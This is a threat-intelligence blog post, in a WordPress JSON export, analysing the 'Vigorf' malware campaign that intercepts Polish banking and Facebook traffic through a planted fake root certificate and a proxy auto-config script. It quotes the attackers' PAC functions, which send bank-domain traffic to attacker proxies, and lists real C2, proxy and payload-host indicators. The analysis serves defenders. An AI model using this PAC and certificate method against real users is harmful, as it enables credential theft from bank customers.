{"id":2667,"date":"2024-09-25T19:22:09","date_gmt":"2024-09-25T19:22:09","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2667"},"modified":"2025-07-29T06:03:45","modified_gmt":"2025-07-29T06:03:45","slug":"vigorf-malware-intercepting-facebook-and-banking-traffic","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/vigorf-malware-intercepting-facebook-and-banking-traffic\/","title":{"rendered":"Vigorf Malware Intercepting Facebook and Banking Traffic"},"content":{"rendered":"
\n
\"\"<\/figure>\n<\/div>\n\n\n

Vigorf Malware Intercepting Facebook and Banking Traffic <\/strong><\/p>\n\n\n\n

LMNTRIX analysts have detected a malware sample targeting users in Poland which ultimately commandeers their traffic when they visit Facebook or a number of Polish banking sites. <\/p>\n\n\n\n

Dubbed \u2018Vigorf\u2019, it uses advanced evasion techniques to bypass the security controls of the target network. A particularly advanced feature of Vigorf is that it uses a fake Comodo SSL certificate as part of the malware payload installer, as well as a proxy server to bypass network security.  <\/p>\n\n\n\n

At a high level, the attack chain is as follows: <\/p>\n\n\n\n

\u2022    The victim receives a spam mail containing an embedded OLE object in a Word document that executes the PowerShell script \u201cinstaller.ps1\u201d <\/p>\n\n\n\n

\u2022    The malicious file \u201cpl.exe\u201d is downloaded and executed <\/p>\n\n\n\n

\u2022    The malware \u201cpl.exe\u201d adds a fake Comodo SSL certificate, saved in the Temp folder, to Root Trust<\/p>\n\n\n\n

\u2022    A Proxy Auto Configuration (PAC) script is added to System Proxy settings<\/p>\n\n\n\n

\u2022    When a victim visits any of the sites mentioned in the PAC script, the proxy is enabled, and attackers can snoop the victim\u2019s communications<\/p>\n\n\n\n

The sites currently listed in the PAC script are largely banking sites including the Polish banks MBank, GetIn Bank, Alior Bank, and iPKO, as well as the Polish presence of ING.<\/p>\n\n\n\n

Beyond banking sites, Facebook\u2019s Polish site is also included in the PAC script. <\/p>\n\n\n\n

Whenever a user infected by Vigorf visits any of the above sites, the attackers are able to see all the user\u2019s previously encrypted communications, including log in credentials.   <\/p>\n\n\n\n

Installer Details \u2013 \u201cinstaller.ps1\u201d<\/strong><\/p>\n\n\n\n

\u2022    MD5: 43da184a59baa821ea7c4e25e6fde4d5<\/p>\n\n\n\n

\u2022    Filename: installer.ps1<\/p>\n\n\n\n

The PowerShell-based installer uses a fake Comodo Root Certificate for SSL based connections. This allows the attacker to have \u2018man-in-the-middle\u2019 functionality, intercepting traffic without triggering security warnings. This particular trade craft has not been seen in the wild since Operation Emmental<\/a> in 2014.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 1: Fake Comdo SSL Certificate<\/em><\/p>\n\n\n\n

The PowerShell script contains the certificate in encoded form. It is written to file \u201c_w41415_log.log\u201d inside the user\u2019s Temp folder. It is also added to the Root Trust Store of the infected system using the Windows utility \u201ccertutil.exe\u201d.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 2: Fake Root Cert used by Vigorf <\/em><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 3: Windows utility \u201ccertutil.exe\u201d is used to add store Root<\/em><\/p>\n\n\n\n

Once the certificate has been added, the installer then connects to an IP to download the malware and save it in the user\u2019s local AppData folder (\u201cC:\\Users\\<username>\\AppData\\Local\u201d) with a random file name. <\/p>\n\n\n\n

The downloaded malware is then executed as a different process. Initially, the IP address hosting the malware belonged to VULTR, a cloud provider, but at the time of writing this IP was taken offline. As we have seen the attackers recently update their proxy scripts (further below) we believe the malware is being hosted on a new site and the campaign is still active. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 4: Malware Payload download URL used in the script <\/em><\/p>\n\n\n\n

The PowerShell script also references another IP (45[.]55[.]107[.]240), which we have identified as the Command and Control server.<\/p>\n\n\n\n

Malware Details \u2013 \u201cpl.exe\u201d<\/strong><\/p>\n\n\n\n

\u2022    MD5: 4535642aada6b2e12cf9f620113fc377<\/p>\n\n\n\n

\u2022    Filename: pl.exe<\/p>\n\n\n\n

After being downloaded, \u201cpl.exe\u201d again executes \u201ccertutil.exe\u201d in order to add the certificate from the file \u201c_w41415_log.log\u201d to the system Root Trust Store \u2013 as seen below:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 5: Execution of Process \u201cCertutil.exe\u201d to add certificate from \u201c_w41415_log.log\u201d<\/em><\/p>\n\n\n\n

Vigorf then executes a PAC file which contains a set of rules coded in JavaScript. This allows a web browser to determine whether to send web traffic direct to the Internet or if it should be sent via a proxy server.<\/p>\n\n\n\n

PAC files control how a web browser handles HTTP, HTTPS, and FTP traffic. We observed the malware calling out to [http]:\/\/spiderbat[.]top\/corporate2\/index.js=14854f… (below). This is the URL which contains the PAC scripts. During intelligence gathering, we noticed the attackers updating the scripts. <\/p>\n\n\n\n

In simple terms, the PAC script contains the list of sites that the attackers can intercept traffic from when an infected user visits them. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 6: Malware download \u201cJavaScript\u201d File<\/em><\/p>\n\n\n\n

While writing this article, we observed that the attackers changed their proxy server, as the previous IP was marked as malicious by OSINT services. This suggests the campaign ongoing. The AutoConfigURL setting points to a web address that contains the below proxy settings \u2013 once Vigorf is successfully executed, these settings are enforced for the infected system. <\/p>\n\n\n\n

Old PAC script:<\/strong><\/p>\n\n\n\n

1.    function FindProxyForURL(url, host) { var proxy = “PROXY coughsmoggyspark.co:8001;”; var hosts = new Array(‘*whoer.net’,’*.ipko.pl*’,’*mbank.pl*’,’login.ingbank.pl*’,’*centrum24.pl*’); for (var i = 0; i < hosts.length; i++) { if (shExpMatch(host, hosts[i])) { return proxy } } return “DIRECT”<\/p>\n\n\n\n

2.    function FindProxyForURL(url, host) { var proxy = “PROXY 209.250.247.168:8001;”; var hosts = new Array(‘*whoer.net’,’*.ipko.pl*’,’*mbank.pl*’,’login.ingbank.pl*’,’*centrum24.pl*’); for (var i = 0; i < hosts.length; i++) { if (shExpMatch(host, hosts[i])) { return proxy } } return “DIRECT”<\/p>\n\n\n\n

New PAC script:<\/strong><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 7: New PAC script of the campaign<\/em><\/p>\n\n\n\n

The above captured code snippet shows the attackers are continuously changing the proxy server but using the same port (8001). Additionally, they\u2019re only enabling this proxy for specific .pl (Poland) top-level domain sites. Also, attackers are continuously adding new domains to apply proxy settings.<\/p>\n\n\n\n

Proxy Server:<\/p>\n\n\n\n

1.    coughsmoggyspark.co<\/p>\n\n\n\n

2.    209.250247.168<\/p>\n\n\n\n

3.    209.250.251.127<\/p>\n\n\n\n

Proxy enabled sites:<\/p>\n\n\n\n

1.    *.whoer.net<\/p>\n\n\n\n

2.    *wp.pl<\/p>\n\n\n\n

3.    *.o2.pl<\/p>\n\n\n\n

4.    *facebook.pl<\/p>\n\n\n\n

5.    *ipko.pl*<\/p>\n\n\n\n

6.    *mbank.pl*<\/p>\n\n\n\n

7.    *login.ingbank.pl*<\/p>\n\n\n\n

8.    *centrum24.pl*<\/p>\n\n\n\n

9.    *secure.getinbank.pl*<\/p>\n\n\n\n

10.    *aliorbank.pl*<\/p>\n\n\n\n

The three proxy servers above are attacker controlled, and represent the infrastructure used to intercept traffic and steal credentials. The 10 proxy-enabled sites are the sites being targeted by the attacker with their PAC script. This means that when a user infected by Vigorf visits any of these sites, the user\u2019s traffic will not communicate directly with those sites but will do so via an attacker-controlled proxy server \u2013 which is capable of SSL interception thanks to the attacker having already installed their fake SSL certificate in the Root trust. <\/p>\n\n\n\n

Thus, the infected system completely trusts the proxy server and the proxy server is able to decrypt and re-encrypt the packets, giving the attacker man-in-the-middle abilities without raising any browser security alerts.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 8: Attackers are able to intercept traffic between victims and Polish bank mBank<\/em> <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 9: Attackers are able to intercept traffic between victims and Polish ING customers <\/em><\/p>\n\n\n\n

Below is an illustration to help visualise how the traffic is intercepted. Once a victim visits one of the 10 proxy-enable sites, when they enter their log in details, the traffic is sent to the proxy server, decrypted and collected by the attacker, before being re-encrypted and sent to site. The attacker now has the victim\u2019s log in details and can use them at will.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Image 10: Packet Flow illustration of traffic interception used by threat actors.<\/em><\/p>\n\n\n\n

Indicators of Compromise<\/strong><\/p>\n\n\n\n

MD5<\/td>43da184a59baa821ea7c4e25e6fde4d5<\/td>installer.ps1<\/td><\/tr>
SHA1<\/td>763150139510937b182e51f72ccbe28a1934c4cc<\/td>installer.ps1<\/td><\/tr>
SHA256<\/td>f91927897b5aed4c3454eca429bd2cb416bdd6deb4f80c68b420c8699b6c63fa<\/td>installer.ps1<\/td><\/tr>
IPV4<\/td>140[.]82[.]33[.]56<\/td>Malware host<\/td><\/tr>
IPV4<\/td>45[.]55[.]107[.]240<\/td>CNC<\/td><\/tr>
MD5<\/td>80A3A7F3DA32CBF6E324B26AF7D2EEFF<\/td>_w41415_log.log<\/td><\/tr>
DOMAIN<\/td>hxxp:\/\/spiderbat[.]top\/corporate2\/index.js<\/td>PAC URL<\/td><\/tr>
DOMAIN<\/td>hxxp:\/\/glibitchyard[.]co\/corporate2\/index.js<\/td>PAC URL<\/td><\/tr>
DOMAIN<\/td>hxxp:\/\/spiderbat[.]top\/corporate2\/<\/td>PAC URL<\/td><\/tr>
DOMAIN<\/td>coughsmoggyspark[.]co<\/td>Proxy Server<\/td><\/tr>
IPV4<\/td>209[.]250[.]247[.]168<\/td>Proxy Server<\/td><\/tr>
IPV4<\/td>209[.]250[.]251[.]127<\/td>Proxy Server<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Mitigation <\/strong>

Users are encouraged to update existing security solutions with the IOCs listed above. As always, exercise caution when dealing with emails from unknown sources and do not click on any links or open attachment from emails that are untrusted. <\/p>\n\n\n\n

On 2019-03-04<\/p>\n","protected":false},"excerpt":{"rendered":"

Vigorf Malware Intercepting Facebook and Banking Traffic  LMNTRIX analysts have detected a malware sample targeting users in Poland which ultimately commandeers their traffic when they visit Facebook or a number of Polish banking sites.  Dubbed ‘Vigorf’, it uses advanced evasion techniques to bypass the security controls of the target network. A particularly advanced feature of […]<\/p>\n","protected":false},"author":1,"featured_media":2686,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2667","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2667"}],"version-history":[{"count":4,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667\/revisions"}],"predecessor-version":[{"id":4303,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2667\/revisions\/4303"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2686"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2667"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}